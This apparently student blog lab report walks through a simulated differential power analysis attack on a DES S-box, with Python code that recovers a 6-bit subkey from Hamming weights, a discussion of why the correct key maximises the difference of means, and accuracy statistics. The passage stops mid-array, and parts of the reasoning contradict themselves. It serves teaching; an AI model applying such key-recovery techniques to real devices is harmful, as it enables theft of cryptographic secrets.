<content type="html"><![CDATA[<p>—————————————202/12/19 更新—————————————<br>在输入时除了密钥的遍历范围因为DES的S盒的“6进4出“机制导致范围限定在0-63以外,明文在作为S盒输入的时候也是被限制在每组长度为64。我将明文数组长度从1000更新为64后的猜测正确率也是100%。<br>——————————————-起始内容——————————————-</p><h2 id="实验目的"><a href="#实验目的" class="headerlink" title="实验目的"></a>实验目的</h2><ol><li>掌握S盒侧信道攻击的基本原理;</li><li>掌握汉明重量攻击模型;</li><li>掌握DPA攻击基本原理和方法。</li></ol><h2 id="实验人数"><a href="#实验人数" class="headerlink" title="实验人数"></a>实验人数</h2><p>每组1人</p><h2 id="系统环境"><a href="#系统环境" class="headerlink" title="系统环境"></a>系统环境</h2><p>Windows</p><h2 id="实验原理"><a href="#实验原理" class="headerlink" title="实验原理"></a>实验原理</h2><ol><li>测量阶段,选取随机数量明文和设定好的正确密钥进行异或,得到的6bit结果作为S盒的输入,S盒的输出需统计二进制中1的个数,作为汉明重量,所有输出得到一个汉明重量数组。</li><li>攻击阶段,需要遍历密钥的所有可能,每次遍历都需经历测量阶段,最后得到所有猜测密钥的汉明重量数组,且每个都需要计算数组元素中间值,作为划分正确密钥得到的汉明重量数组的依据,正确密钥得到的汉明重量数组划分成两个集合,分别计算$\overline{x_H}=\frac{1}{\lvert H \rvert}\sum_{i\in H}^{}{x_i}$,$\overline{x_L}=\frac{1}{\lvert L \rvert}\sum_{i\in L}^{}{x_i}$,其中$||$表示集合元素大小,得到差值求均值差$DpaValue=\overline{x_H}-\overline{x_L}$,最后选择所有差值最大的所对应的猜测密钥为正确密钥。</li></ol><h2 id="实验内容"><a href="#实验内容" class="headerlink" title="实验内容"></a>实验内容</h2><ol><li><p>完成Sboxdpa仿真-student.py程序中的空缺部分</p><ul><li><p>补充n、plaintext、keyTrue</p></li><li><p>补充HWfun函数,返回输入的汉明重量</p></li><li><p>补充主函数,得到输出相应的汉明重量向量</p></li></ul></li><li><p>完成Sboxdpa-student.py文件中的空缺部分,即</p><ul><li><p>补充plaintext、power_std</p></li><li><p>补充DPAfun函数,计算汉明差值</p></li><li><p>补充主函数,求正确猜测密钥</p></li></ul></li><li><p>实验测试2组数据</p></li></ol><h2 id="实验步骤"><a href="#实验步骤" class="headerlink" title="实验步骤"></a>实验步骤</h2><h3 id="完善Sboxdpa仿真-student-py程序"><a href="#完善Sboxdpa仿真-student-py程序" class="headerlink" title="完善Sboxdpa仿真-student.py程序"></a>完善Sboxdpa仿真-student.py程序</h3><h4 id="补充变量"><a href="#补充变量" class="headerlink" title="补充变量"></a>补充变量</h4><p>补充n、plaintext、keyTrue三个变量</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">n = <span class="number">9</span><span class="comment">#数组长度</span></span><br><span class="line">plainlist = [<span class="number">41</span>, <span class="number">35</span>, <span class="number">62</span>, <span class="number">4</span>, <span class="number">33</span>, <span class="number">44</span>, <span class="number">22</span>, <span class="number">46</span>, <span class="number">18</span>]<span class="comment">#明文数组</span></span><br><span class="line">keyTrue = <span class="number">43</span><span class="comment">#加密所用密钥</span></span><br></pre></td></tr></table></figure><h4 id="完善HWfun函数"><a href="#完善HWfun函数" class="headerlink" title="完善HWfun函数"></a>完善HWfun函数</h4><p>本质上是计算十进制数转换成二进制后含1的数量,则可以采用快速法计算。这种方法运算次数与输入n的大小无关,只与n中1的个数有关。如果n的二进制表示中有k个1,那么这个方法只需要循环k次即可。其原理是不断清除n的二进制表示中最右边的1,同时累加计数器,直至n为0。</p><p>补充代码如下:</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">def</span> <span class="title function_">HWfun</span>(<span class="params">num</span>):</span><br><span class="line"> <span class="comment"># 统计输入num的汉明重量并返回</span></span><br><span class="line"> ans = <span class="number">0</span></span><br><span class="line"> <span class="keyword">if</span> num == <span class="number">0</span>:</span><br><span class="line"> <span class="keyword">return</span> <span class="number">0</span></span><br><span class="line"> <span class="keyword">while</span> num > <span class="number">0</span>:</span><br><span class="line"> num &= (num - <span class="number">1</span>)</span><br><span class="line"> ans += <span class="number">1</span></span><br><span class="line"> <span class="keyword">return</span> ans</span><br></pre></td></tr></table></figure><blockquote><p>为什么n &= (n – 1)能清除最右边的1呢?因为从二进制的角度讲,n相当于在n - 1的最低位加上1。举个例子,8(1000)= 7(0111)+ 1(0001),所以8 & 7 = (1000)&(0111)= 0(0000),清除了8最右边的1(其实就是最高位的1,因为8的二进制中只有一个1)。再比如7(0111)= 6(0110)+ 1(0001),所以7 & 6 = (0111)&(0110)= 6(0110),清除了7的二进制表示中最右边的1(也就是最低位的1)。</p></blockquote><h4 id="完善主函数"><a href="#完善主函数" class="headerlink" title="完善主函数"></a>完善主函数</h4><p>使用表格美化库完善输出。</p><p>补充代码如下:</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">if</span> __name__ == <span class="string">"__main__"</span>:</span><br><span class="line"> <span class="comment"># 补充:S盒输出对应汉明重量列表</span></span><br><span class="line"> table = pt.PrettyTable()</span><br><span class="line"> hw_std = []</span><br><span class="line"> HWout = sboxout(n, plainlist, keyTrue)</span><br><span class="line"> <span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(n):</span><br><span class="line"> hw_std.append(HWfun(HWout[i]))</span><br><span class="line"> table.add_column(<span class="string">'序号'</span>,[i <span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">1</span>,n+<span class="number">1</span>)])</span><br><span class="line"> table.add_column(<span class="string">'明文-十进制'</span>,[index <span class="keyword">for</span> index <span class="keyword">in</span> plainlist])</span><br><span class="line"> table.add_column(<span class="string">'S盒输出-十进制'</span>, [index <span class="keyword">for</span> index <span class="keyword">in</span> HWout])</span><br><span class="line"> table.add_column(<span class="string">'S盒输出-汉明重量'</span>, [index <span class="keyword">for</span> index <span class="keyword">in</span> hw_std])</span><br><span class="line"> <span class="built_in">print</span>(table)</span><br></pre></td></tr></table></figure><h4 id="程序运行结果"><a href="#程序运行结果" class="headerlink" title="程序运行结果"></a>程序运行结果</h4><p>[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传<br><img src="https://img-blog.csdnimg.cn/409ab0df29ba4a8fb80939d9939bc4ee.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBAUmVhcGVyX01YQkc=,size_20,color_FFFFFF,t_70,g_se,x_16#pic_center" alt="在这里插入图片描述"></p><center> <b> <small> 图6.1     程序Sboxdpa仿真-student.py的表格输出 </small> </b></center>### 完善Sboxdpa-student.py程序<h4 id="补充变量-1"><a href="#补充变量-1" class="headerlink" title="补充变量"></a>补充变量</h4><p>我在此程序中采用的plaintlist数组(明文数组)是由<code>plainlist = list(np.random.randint(64, size=1000))</code>函数生成的1000长度的数组,模拟教材上的运行基数。同理,power_std数组(正确密钥处理得到的汉明重量数组)同样长度1000,数组内的元素展示位置在8.4数据统计中,“<a href="#明文数组长度为1000" target="_self">明文数组长度为1000</a>”那里。</p><h4 id="完善DPAfun函数"><a href="#完善DPAfun函数" class="headerlink" title="完善DPAfun函数"></a>完善DPAfun函数</h4><p><code>Meanfun</code>函数我有所改动:</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">def</span> <span class="title function_">Meanfun</span>(<span class="params">num</span>):</span><br><span class="line"> total = <span class="number">0</span></span><br><span class="line"> length = <span class="built_in">len</span>(num)</span><br><span class="line"> <span class="keyword">if</span> length == <span class="number">0</span>:</span><br><span class="line"> <span class="keyword">return</span> <span class="number">0</span></span><br><span class="line"> <span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(length):</span><br><span class="line"> total = total + num[i]</span><br><span class="line"> <span class="keyword">return</span> total / length</span><br></pre></td></tr></table></figure><p>函数思想是取使用猜测密钥处理的汉明重量数组的中间值作为划分使用正确密钥处理的汉明重量数组的依据,随后,函数返回划分后集合的差值。</p><p>补充代码如下:</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">def</span> <span class="title function_">DPAfun</span>(<span class="params">n, pstd, ptest</span>):</span><br><span class="line"> <span class="comment"># 以2为界,计算不同汉明重量的集合差值</span></span><br><span class="line"> L_list = []</span><br><span class="line"> H_list = []</span><br><span class="line"> med = median(ptest)</span><br><span class="line"> <span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(n):</span><br><span class="line"> <span class="keyword">if</span> ptest[i] <= med:</span><br><span class="line"> L_list.append(pstd[i])</span><br><span class="line"> <span class="keyword">else</span>:</span><br><span class="line"> H_list.append(pstd[i])</span><br><span class="line"> <span class="keyword">return</span> Meanfun(H_list) - Meanfun(L_list)</span><br></pre></td></tr></table></figure><h4 id="完善主函数-1"><a href="#完善主函数-1" class="headerlink" title="完善主函数"></a>完善主函数</h4><p>运行逻辑&思路为遍历所有密钥——64个,将明文和每个密钥异或后的结果作为S盒的输入,得到S盒的输出(模拟DES处理流程),并求得64个汉明重量数组,将64个汉明重量数组带入DPAfun函数进行运算,取DPAfun函数返回值中的最大值对应的密钥,即为正确密钥。</p><blockquote><p>因为DES的S盒运算是“6进4出”的,明文和密钥的异或是在进入S盒前,要满足6位输入的需求,所以密钥遍历是2的六次方次。</p></blockquote><p>补充代码如下:</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">if</span> __name__ == <span class="string">"__main__"</span>:</span><br><span class="line"> <span class="comment"># 猜测密钥</span></span><br><span class="line"> keyList = [i <span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">64</span>)]</span><br><span class="line"> DPAlist = []</span><br><span class="line"> n = <span class="built_in">len</span>(plainlist)</span><br><span class="line"> <span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">64</span>):</span><br><span class="line"> hw_std = []</span><br><span class="line"> HWout = sboxout(n, plainlist, i)<span class="comment">#S盒输出</span></span><br><span class="line"> <span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(n):</span><br><span class="line"> hw_std.append(HWfun(HWout[i]))<span class="comment">#汉明重量</span></span><br><span class="line"> DPAlist.append(DPAfun(n, power_std, hw_std))<span class="comment">#正确密钥得到的汉明重量数组被划分成两个集合后的集合均值差</span></span><br><span class="line"> final_dict = <span class="built_in">dict</span>(<span class="built_in">zip</span>(keyList,DPAlist))</span><br><span class="line"> <span class="built_in">print</span>(<span class="string">"正确密钥为:"</span>,<span class="built_in">max</span>(final_dict, key=final_dict.get))<span class="comment">#取最大集合均值差对应的密钥</span></span><br></pre></td></tr></table></figure><p>==运行结果我放在了总结里,方便进行对比。==<strong>具体位置在8.4数据统计中</strong>,其中<a href="#明文数组长度为1000" target="_self">明文数组长度为1000</a>测试结果的截图。</p><h2 id="思考问题"><a href="#思考问题" class="headerlink" title="思考问题"></a>思考问题</h2><h3 id="对分组密码算法进行DPA攻击时的基本原理"><a href="#对分组密码算法进行DPA攻击时的基本原理" class="headerlink" title="对分组密码算法进行DPA攻击时的基本原理"></a>对分组密码算法进行DPA攻击时的基本原理</h3><p>DPA攻击是一种对密码芯片的泄漏功耗 进行统计分析而恢复密钥的攻击方法。DPA攻击的方法是对大量的曲线样点进行功耗统计测试 ,即根据 大量功耗样本来分析密钥的值 ,它具有比简单功耗攻击更高的强度 。</p><p>攻击分组密码算法我认为是攻击算法所用的S盒,因为S盒是离散处理数据,像行位移和列变换这种都是线性变换,离散处理的结果不容易观察出规律性。DPA攻击,需要先获取N次密码运算后得到的明文(非密码运算结果),密文,产生的功耗;然后定义一个与密钥密切相关的分割函数J(密文,k)和能量消耗依赖很强的d,猜测子密钥k值,并基于采样时间点,得到两个功耗曲线子集合(d=0和d=1);对功耗曲线进行计算,计算平均功耗值从而得到差分功耗曲线;观察差分功耗曲线,若某个位置出现明细那的尖峰,则表示k猜测正确;猜测正确后根据密码算法的子密钥生成算法逆推密钥。(不同分组密码的子密钥生成算法和密钥位数不同,逆推时穷举搜索次数不同)</p><h2 id="总结"><a href="#总结" class="headerlink" title="总结"></a>总结</h2><h3 id="猜测正确密钥思路详解"><a href="#猜测正确密钥思路详解" class="headerlink" title="猜测正确密钥思路详解"></a><strong>猜测正确密钥思路详解</strong></h3><p>因为DES的S盒运算是“6进4出”的,所以输出的数值化为二进制后所含<code>1</code>的个数范围为0-4。所以猜测密钥处理得到的64个汉明数组的中间值无外乎就0,1,2,3,4五种。但是<strong>只有正确密钥处理得到的汉明数组进行DPAfun函数处理后得到的差值最大</strong>。</p><h3 id="为什么集合均值的差值最大就是正确密钥?"><a href="#为什么集合均值的差值最大就是正确密钥?" class="headerlink" title="为什么集合均值的差值最大就是正确密钥?"></a><strong>为什么集合均值的差值最大就是正确密钥?</strong></h3><h4 id="猜测密钥汉明重量数组的中间值为2时的分析"><a href="#猜测密钥汉明重量数组的中间值为2时的分析" class="headerlink" title="猜测密钥汉明重量数组的中间值为2时的分析"></a>猜测密钥汉明重量数组的中间值为2时的分析</h4><p>2本身作为0-5的中间值,在汉明重量数组内元素基数达到一定程度时数组中间值近乎都是2,我的采用1000长度的明文数组得到的64个汉明重量数组的中间值全是2。集合划分是猜测密钥汉明重量数组内元素值小于等于2,正确密钥汉明重量数组内的元素就要被划分到L集合,剩下的划分到H集合,而影响两个集合的差值的根本原因是部分元素在两个集合中的迁移。</p><p>举例进行解析比较方便理解:(ptest数组的中间值为2)</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">ptsd = [<span class="number">1</span>,<span class="number">2</span>,<span class="number">3</span>,<span class="number">4</span>,<span class="number">4</span>,<span class="number">3</span>,<span class="number">1</span>,<span class="number">2</span>,<span class="number">3</span>,<span class="number">4</span>,<span class="number">3</span>,<span class="number">4</span>,<span class="number">1</span>,<span class="number">2</span>,<span class="number">1</span>,<span class="number">2</span>,……] <span class="comment">#正确密钥得到的汉明重量数组</span></span><br><span class="line">ptest = [<span class="number">1</span>,<span class="number">2</span>,<span class="number">3</span>,<span class="number">4</span>,<span class="number">3</span>,<span class="number">4</span>,<span class="number">2</span>,<span class="number">1</span>,<span class="number">1</span>,<span class="number">1</span>,<span class="number">2</span>,<span class="number">2</span>,<span class="number">3</span>,<span class="number">3</span>,<span class="number">4</span>,<span class="number">4</span>,……] <span class="comment">#猜测密钥得到的汉明重量数组</span></span><br></pre></td></tr></table></figure><p>将数组划分成五段,方便观看。</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="number">0</span> <span class="number">1</span> <span class="number">2</span> <span class="number">3</span> <span class="number">4</span> | <span class="number">4</span> <span class="number">3</span> <span class="number">0</span> <span class="number">0</span> <span class="number">1</span> <span class="number">2</span> | <span class="number">3</span> <span class="number">4</span> <span class="number">3</span> <span class="number">4</span> <span class="number">3</span> <span class="number">4</span> | <span class="number">0</span> <span class="number">1</span> <span class="number">2</span> <span class="number">0</span> <span class="number">1</span> <span class="number">2</span> | …………</span><br><span class="line"><span class="number">0</span> <span class="number">1</span> <span class="number">2</span> <span class="number">3</span> <span class="number">4</span> | <span class="number">3</span> <span class="number">4</span> <span class="number">1</span> <span class="number">2</span> <span class="number">2</span> <span class="number">1</span> | <span class="number">0</span> <span class="number">0</span> <span class="number">1</span> <span class="number">1</span> <span class="number">2</span> <span class="number">2</span> | <span class="number">3</span> <span class="number">3</span> <span class="number">3</span> <span class="number">4</span> <span class="number">4</span> <span class="number">4</span> | …………</span><br></pre></td></tr></table></figure><p>中间值为2的划分规则上面说过了我就不赘述了。我将中间值为2的所有ptsd两集合划分情况进行了遍历举例。</p><p>第一段,ptest数组和ptsd数组每一位的对应值都相同,所以不影响划分后集合的均值差;</p><p>第二段,ptest数组和ptsd数组虽然每一位的对应值都不同,但是ptsd数组划分后0,1,2都划分到L集合,3,4都划分到H集合,对集合的均值差不影响;</p><p>第三段,ptest数组和ptsd数组每一位的对应值都不同,原本应该划分到H集合的4个ptsd数组元素因为对应位置的ptest的值小于等于中间值2,结果被划分到了L集合,这就导致L集合的平均值必然增大,H集合的平均值可能减小,集合均值差减小;</p><p>第四段,ptest数组和ptsd数组每一位的对应值都不同,原本应该划分到L集合的4个ptsd数组元素因为对应位置的ptest的值大于中间值2,结果被划分到了H集合,这就导致H集合的平均值必然减小,L集合的平均值可能增大,集合均值差减小;</p><p>然后问题又来了,为什么第三、第四段的集合元素划分会导致两个集合的“必然”变化和可能变换呢?</p><h4 id="集合均值的“必然”和“可能”变化分析"><a href="#集合均值的“必然”和“可能”变化分析" class="headerlink" title="集合均值的“必然”和“可能”变化分析"></a>集合均值的“必然”和“可能”变化分析</h4><p>首先,我们要明确在汉明重量数组的中间值为2的情况下,L集合因为集合内元素的最低值为0、最高值为2,其均值范围为0-2;同理,H集合的均值范围为3-4。</p><p><strong>第三段</strong>情况如下:</p><p>当3,4这种大于原L集合最大均值的数归到L集合中时,会导致L集合的均值必然增大;</p><p>失去部分3,4元素的H集合的均值可能变大,变小或不变。</p><ul><li>因为3是H集合的最低均值,所以当失去元素3时集合均值会增大或者不变(原H集合全是3)。</li><li>因为4是H集合的最高均值,所以当失去元素4时集合均值会减小或者不变(原H集合全是4)。</li></ul><p><strong>第四段</strong>情况如下:</p><p>当0,1,2这种小于原H集合最小均值的数归到H集合中时,会导致H集合的均值必然减小;</p><p>失去部分0,1,2元素的L集合的均值可能变大,变小或不变。</p><ul><li>因为0是L集合的最低均值,所以当失去元素0时集合均值会增大或者不变(原L集合全是0)。</li><li>因为1是L集合的中间均值,所以当失去元素1时<ul><li>集合均值减小——原L集合均值大于1;</li><li>集合均值不变——原L集合均值等于1;</li><li>集合均值增大——原L集合均值小于1;</li></ul></li><li>因为2是L集合的最高均值,所以当失去元素2时集合均值会减小或者不变(原L集合全是2)。</li></ul><p>综上来看,第三段的情况下必然会导致L集合的必然增大,H集合三种变化可能性都有,集合均值差总体来看是减小的;第四段的情况下必然会导致H集合的必然减小,H集合三种变化可能性都有,集合均值差总体来看是减小的。</p><p><strong>注意:</strong></p><p>看上面的解释的时候可能会疑惑,比如第三段情况,L集合均值增大,H集合也有可能增大,那为什么不会出现均值增大的情况呢?</p><p>这种情况在数组元素基数足够大的时候是不用担心的。当数组长度无限大时,数组内0,1,2,3,4这5个元素出现概率是等概的。就像我们投硬币,掷骰子一样,基数足够大就可以实现。那咱们以这个基础上再去看,拿情况稍微复杂一些的第四段情况举例:在基数足够大的情况下集合内元素全是唯一值的情况几乎是不可能的,所以不考虑均值不变的情况,那L集合均值增大减小的概率是对半开的,但是H集合是必然增大的,则综合来看,集合的均值差必然减小。</p><p><strong>小结:</strong></p><p>所以只有当ptest数组内的元素和ptsd数组内的元素一一相等时,两集合的均值差才能最大,即<strong>猜测密钥猜测到正确密钥时,两集合的均值差才能最大。</strong></p><blockquote><p>第一段或第二段情况可能在ptest数组中存在部分,但是终究会出现第三段或第四段的情况,导致集合差值减小。</p></blockquote><h3 id="猜测密钥汉明重量数组的中间值不为2时的分析"><a href="#猜测密钥汉明重量数组的中间值不为2时的分析" class="headerlink" title="猜测密钥汉明重量数组的中间值不为2时的分析"></a>猜测密钥汉明重量数组的中间值不为2时的分析</h3><p>猜测密钥汉明重量数组的中间值为0,1,3,4的情况在汉明重量数组元素基数足够大时几乎不可能出现,不过在这里也把出现这种情况分析一下。</p><p>其实原因也很简单,本质上和上面中间值为2时一样。当中间值为0或1时,就表明数组中最少一半的值为0或1,但对应位置的正确密钥汉明重量数组的元素大概率不可能全是0或1,那大于中间值的猜测密钥汉明重量数组对应位置的正确密钥汉明重量数组元素全都被划分到H集合,包括小于3的元素,这就会导致H集合均值的必然减小,L集合均值三种变化皆有可能。这种情况的结论在<strong>8.2</strong>中已经得出,即集合均值差必然减小。</p><p>同理,当中间值为3或4时,就表明数组中最少一半的值为3或4,最终会导致L集合均值的必然增大,L集合均值三种变化皆有可能,集合均值差必然减小。</p><h3 id="数据统计"><a href="#数据统计" class="headerlink" title="数据统计"></a>数据统计</h3><p>理论说明比较枯燥,也没有数据感受直观,下面我将展示一些我统计到的数据:</p><p>测试代码如下,只需要改动主函数即可:</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">if</span> __name__ == <span class="string">"__main__"</span>:</span><br><span class="line"> table = pt.PrettyTable()</span><br><span class="line"> guess = []</span><br><span class="line"> keyList = [i <span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">64</span>)]</span><br><span class="line"> n = <span class="built_in">len</span>(plainlist)</span><br><span class="line"> <span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">64</span>):</span><br><span class="line"> power_std = []</span><br><span class="line"> HWout_true = sboxout(n, plainlist, i)</span><br><span class="line"> <span class="keyword">for</span> j <span class="keyword">in</span> <span class="built_in">range</span>(n):</span><br><span class="line"> power_std.append(HWfun(HWout_true[j]))</span><br><span class="line"> DPAlist = []</span><br><span class="line"> <span class="keyword">for</span> k <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">64</span>):</span><br><span class="line"> hw_std = []</span><br><span class="line"> HWout = sboxout(n, plainlist, k)</span><br><span class="line"> <span class="keyword">for</span> m <span class="keyword">in</span> <span class="built_in">range</span>(n):</span><br><span class="line"> hw_std.append(HWfun(HWout[m]))</span><br><span class="line"> DPAlist.append(DPAfun(n, power_std, hw_std))</span><br><span class="line"> final_dict = <span class="built_in">dict</span>(<span class="built_in">zip</span>(keyList, DPAlist))</span><br><span class="line"> guess.append(<span class="built_in">max</span>(final_dict, key=final_dict.get))</span><br><span class="line"> table.add_column(<span class="string">'使用密钥:'</span>, [index <span class="keyword">for</span> index <span class="keyword">in</span> keyList])</span><br><span class="line"> table.add_column(<span class="string">'猜测密钥:'</span>, [index <span class="keyword">for</span> index <span class="keyword">in</span> guess])</span><br><span class="line"> <span class="built_in">print</span>(<span class="string">'正确率:{:.2%}'</span>.<span class="built_in">format</span>(<span class="built_in">len</span>(<span class="built_in">set</span>(keyList) & <span class="built_in">set</span>(guess))/<span class="number">64</span>))</span><br><span class="line"> <span class="built_in">print</span>(table)</span><br></pre></td></tr></table></figure><p>明文数组长度为9的情况下,64次猜测密钥的结果及正确率:</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#示例数组:</span></span><br><span class="line">[<span class="number">41</span>, <span class="number">35</span>, <span class="number">62</span>, <span class="number">4</span>, <span class="number">33</span>, <span class="number">44</span>, <span class="number">22</span>, <span class="number">46</span>, <span class="number">18</span>]</span><br></pre></td></tr></table></figure><p><img src="https://img-blog.csdnimg.cn/1677cd72bbe74f53ae9a722482cab614.png#pic_center" alt="在这里插入图片描述"></p><center> <b> <small> 图8.1     长度9的明文数组测试结果 </small> </b></center><div id="明文数组长度为1000">明文数组长度为1000</div>的情况下,64次猜测密钥的结果及正确率:<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#示例代码</span></span><br><span class="line">[<span class="number">42</span>, <span class="number">17</span>, <span class="number">10</span>, <span class="number">7</span>, <span class="number">22</span>, <span class="number">26</span>, <span class="number">42</span>, <span class="number">31</span>, <span class="number">8</span>, <span class="number">24</span>, <span class="number">40</span>, <span class="number">4</span>, <span class="number">49</span>, <span class="number">53</span>, <span class="number">23</span>, <span class="number">17</span>, <span class="number">16</span>, <span class="number">10</span>, <span class="number">55</span>, <span class="number">4</span>, <span class="number">7</span>, <span class="number">43</span>, <span class="number">29</span>, <span class="number">26</span>, <span class="number">16</span>, <span class="number">21</span>, <span class="number">45</span>, <span class="number">21</span>, <span class="number">37</span>, <span class="number">48</span>, <span class="number">2</span>, <span class="number">49</span>, <span class="number">23</span>, <span class="number">37</span>, <span class="number">58</span>, <span class="number">14</span>, <span class="number">25</span>, <span class="number">60</span>, <span class="number">33</span>, <span class="number">19</span>, <span class="number">17</span>, <span class="number">22</span>, <span class="number">29</span>, <span class="number">47</span>, <span class="number">0</span>, <span class="number">38</span>, <span class="number">43</span>, <span class="number">17</span>, <span class="number">47</span>, <span class="number">9</span>, <span class="number">57</span>, <span class="number">39</span>, <span class="number">62</span>, <span class="number">60</span>, <span class="number">25</span>, <span class="number">28</span>, <span class="number">54</span>, <span class="number">53</span>, <span class="number">12</span>, <span class="number">29</span>, <span class="number">8</span>, <span class="number">60</span>, <span class="number">29</span>, <span class="number">4</span>, <span class="number">28</span>, <span class="number">6</span>, <span class="number">14</span>, <span class="number">12</span>, <span class="number">49</span>, <span class="number">19</span>, <span class="number">23</span>, <span class="number">20</span>, <span class="number">44</span>, <span class="number">43</span>, <span class="number">37</span>, <span class="number">37</span>, <span class="number">54</span>, <span class="number">23</span>, <span class="number">2</span>, <span class="number">20</span>, <span class="number">49</span>, <span class="number">38</span>, <span class="number">32</span>, <span class="number">27</span>, <span class="number">41</span>, <span class="number">9</span>, <span class="number">52</span>, <span class="number">34</span>, <span class="number">24</span>, <span class="number">60</span>, <span class="number">18</span>, <span class="number">4</span>, <span class="number">30</span>, <span class="number">17</span>, <span class="number">51</span>, <span class="number">17</span>, <span class="number">13</span>, <span class="number">41</span>, <span class="number">25</span>, <span class="number">49</span>, <span class="number">12</span>, <span class="number">1</span>, <span class="number">56</span>, <span class="number">4</span>, <span class="number">61</span>, <span class="number">4</span>, <span class="number">38</span>, <span class="number">57</span>, <span class="number">30</span>, <span class="number">60</span>, <span class="number">5</span>, <span class="number">23</span>, <span class="number">23</span>, <span class="number">31</span>, <span class="number">30</span>, <span class="number">56</span>, <span class="number">22</span>, <span class="number">9</span>, <span class="number">41</span>, <span class="number">61</span>, <span class="number">33</span>, <span class="number">20</span>, <span class="number">24</span>, <span class="number">43</span>, <span class="number">30</span>, <span class="number">63</span>, <span class="number">60</span>, <span class="number">33</span>, <span class="number">46</span>, <span class="number">0</span>, <span class="number">41</span>, <span class="number">3</span>, <span class="number">10</span>, <span class="number">49</span>, <span class="number">39</span>, <span class="number">7</span>, <span class="number">14</span>, <span class="number">8</span>, <span class="number">42</span>, <span class="number">6</span>, <span class="number">58</span>, <span class="number">3</span>, <span class="number">10</span>, <span class="number">3</span>, <span class="number">28</span>, <span class="number">33</span>, <span class="number">31</span>, <span class="number">49</span>, <span class="number">24</span>, <span class="number">60</span>, <span class="number">0</span>, <span class="number">54</span>, <span class="number">46</span>, <span class="number">40</span>, <span class="number">27</span>, <span class="number">63</span>, <span class="number">23</span>, <span class="number">30</span>, <span class="number">50</span>, <span class="number">26</span>, <span class="number">23</span>, <span class="number">40</span>, <span class="number">2</span>, <span class="number">54</span>, <span class="number">29</span>, <span class="number">37</span>, <span class="number">17</span>, <span class="number">52</span>, <span class="number">31</span>, <span class="number">11</span>, <span class="number">47</span>, <span class="number">55</span>, <span class="number">7</span>, <span class="number">59</span>, <span class="number">40</span>, <span class="number">18</span>, <span class="number">38</span>, <span class="number">44</span>, <span class="number">12</span>, <span class="number">36</span>, <span class="number">58</span>, <span class="number">27</span>, <span class="number">30</span>, <span class="number">43</span>, <span class="number">49</span>, <span class="number">25</span>, <span class="number">17</span>, <span class="number">47</span>, <span class="number">56</span>, <span class="number">24</span>, <span class="number">28</span>, <span class="number">19</span>, <span class="number">25</span>, <span class="number">28</span>, <span class="number">25</span>, <span class="number">35</span>, <span class="number">52</span>, <span class="number">2</span>, <span class="number">62</span>, <span class="number">48</span>, <span class="number">61</span>, <span class="number">61</span>, <span class="number">63</span>, <span class="number">34</span>, <span class="number">15</span>, <span class="number">55</span>, <span class="number">26</span>, <span class="number">40</span>, <span class="number">0</span>, <span class="number">52</span>, <span 